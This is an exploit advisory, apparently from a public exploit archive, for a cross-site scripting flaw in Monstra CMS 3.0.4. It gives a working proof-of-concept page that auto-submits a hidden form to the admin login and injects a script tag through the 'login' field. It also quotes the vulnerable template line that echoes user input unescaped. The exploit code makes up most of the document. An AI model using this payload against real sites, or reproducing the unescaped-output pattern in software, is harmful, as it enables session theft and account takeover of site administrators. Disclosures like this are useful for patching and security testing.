___________________________________________________
|
| Exploit Title: Monstra cms Cross Site Scripting(XSS)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : http://monstra.org/
| Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
| Version: 3.0.4
| Date: 2017-11-13
| Category: Webapps
| Tested on: Kali-Linux / FireFox
|__________________________________________________
|
| Exploit :
|
|    <html>
|    <body onload="document.exploit.submit()">
|    <form  method="post" action="http://127.0.0.1/monstra-3.0.4/admin/ ">
|    <input type="hidden" name="reset_password_submit" value="hacker" />
|    <input type="hidden" name="answer" value="1" />
|    <input type="hidden" name="login" value="1"/><script>alert(`M.R.S.L.Y`)</script>" />
|    </form>
|    </body>
|    </html>
|
|__________________________________________________
|
| Vulnerable method :
|    $_POST
|
| Vulnerable File:
|    login.template.php
|
| Vulnerable code:
|
|    line 95 :
|    <input name="login" class="form-control" type="text" value="<?php echo $user_login; ?>" />
|__________________________________________________
|
|    Discovered By : M.R.S.L.Y
|__________________________________________________